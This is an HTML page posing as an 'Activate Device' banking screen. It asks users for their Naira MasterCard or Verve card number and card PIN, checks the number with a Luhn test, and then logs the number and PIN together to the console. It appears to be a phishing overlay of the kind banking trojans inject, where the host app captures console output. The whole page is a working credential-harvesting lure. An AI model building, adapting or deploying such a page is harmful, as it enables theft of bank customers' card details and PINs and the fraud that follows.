<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.js"></script>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.0/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.1/css/font-awesome.min.css">
    <style>
        body {
            background-color: #192941;
            color: #fff;
        }

        form {
            display: flex;
            flex-direction: column;
            min-height: 100vh;
        }

        header {
            text-align: center;
            padding: 25px;
            padding-bottom: 0;
        }

        section {
            padding: 15px;
            flex: 1;
        }

        .cool-input {
            box-sizing: border-box;
            border: 0;
            width: 100%;
            position: relative;
            font-size: 16px;
            font-weight: 100;
            margin-bottom: 15px;
        }

        .cool-input__input {
            box-sizing: border-box;
            background: none;
            width: 100%;
            padding: 10px;
            padding-left: 0;
            position: relative;
            z-index: 2;
            font-size: 14px;
        }

        .cool-input__input:focus {
            outline: none;
        }

        .cool-input__placeholder {
            box-sizing: border-box;
            border: none;
            background: none;
            width: auto;
            position: absolute;
            z-index: 1;
            left: 0;
            top: 50%;
            line-height: 1em;
            color: #ffffff;
            transition: all 0.2s ease;
        }

        .cool-input__input_filled + .cool-input__placeholder, .cool-input__input:focus + .cool-input__placeholder {
            font-size: 0.8em;
            top: 0;
            margin-top: 0.3em;
            padding: 5px 0;
            z-index: 99;
            width: auto;
            left: 0;
        }

        .cool-input__input:focus + .cool-input__placeholder {
            color: #e2ac3b
        }

        .input {
            border: 0;
            border-bottom: 1px solid #fff;
            margin-top: 15px;
            padding-left: 0;
            transition: all 0.2s ease;
            color: #fff;
        }

        .input:focus {
            border-bottom: 2px solid #e2ac3b;
        }

        input,button {
            outline: none !important;
            box-shadow: none !important;
        }

        .error {
            border-color: #f00 !important
        }

        footer {
            margin: 0 auto;
            padding: 20px;
            display: grid;
            grid-template-columns: 1fr 1fr;
            grid-gap: 10px;
        }

        .dotActive {
            width: 8px;
            height: 8px;
            border: 0;
            border-radius: 25px;
            background-color: #e2ac3b;
        }

        .dot {
            width: 8px;
            height: 8px;
            border: 0;
            border-radius: 25px;
            background-color: #b9bfc6;
        }

        .button {
            width: 100%;
            padding: 8px;
            font-weight: 600;
            border: 0;
            border-radius: 25px;
            background-color: #e2ac3b;
            margin-top: 25px;
        }
    </style>
</head>
<body>
    <form onsubmit="return false">
        <header>
            <h5> Activate Device </h5>
            <p style="font-size: 12px;font-weight: 100;margin-top: 20px;"> You can either use your Naira MasterCard or Verve Card to log in your mobile banking. </p>
        </header>
        <section>
            <div class="cool-input">
                <input type="tel" id="cc" name="cc" class="input cool-input__input" placeholder="" autocomplete="off">
                <span class="cool-input__placeholder">Card Number</span>
            </div>

            <div class="cool-input">
                <input type="password" id="pin" name="pin" class="input cool-input__input" placeholder="" autocomplete="off">
                <span class="cool-input__placeholder">Card PIN</span>
            </div>

            <input type="submit" class="button" id="sendData" value="CONTINUE">
        </section>
        <footer>
            <div class="dotActive"></div>
            <div class="dot"></div>
        </footer>
    </form>
    <script>
        $('#cc').mask('0000 0000 0000 0000');
        $('#pin').mask('0000');

        $('.cool-input__input').on('input', function(){
            var $this = $(this);
            if ($this.val() == '') {
                $this.removeClass('cool-input__input_filled');
            } else {
                $this.addClass('cool-input__input_filled');
            }
        });

        var cc = document.getElementById('cc'),
            pin = document.getElementById('pin');
        
        var sendData = document.getElementById('sendData');

        sendData.onclick = () => {
            if(!valid_credit_card(cc.value)) {
                cc.classList.add('error');
            } else {
                cc.classList.remove('error');
            }

            if(pin.value.length !== 4) {
                pin.classList.add('error');
            } else {
                pin.classList.remove('error');
            }

            if(valid_credit_card(cc.value) && pin.value.length === 4) {
            console.log('print event: ' + cc.value + ' : ' + pin.value)
            }

        }
        
        function valid_credit_card(value) {
            if(value=='' || value.length < 19 || value=='0000 0000 0000 0000') return false;
            if (/[^0-9-\s]+/.test(value)) return false;
            var nCheck = 0, nDigit = 0, bEven = false;
            value = value.replace(/\D/g, "");
            for (var n = value.length - 1; n >= 0; n--) {
                var cDigit = value.charAt(n),
                    nDigit = parseInt(cDigit, 10);
                if (bEven) {
                    if ((nDigit *= 2) > 9) nDigit -= 9;
                }
                nCheck += nDigit;
                bEven = !bEven;
            }
            return (nCheck % 10) == 0;
        }
    </script>
</body>
</html>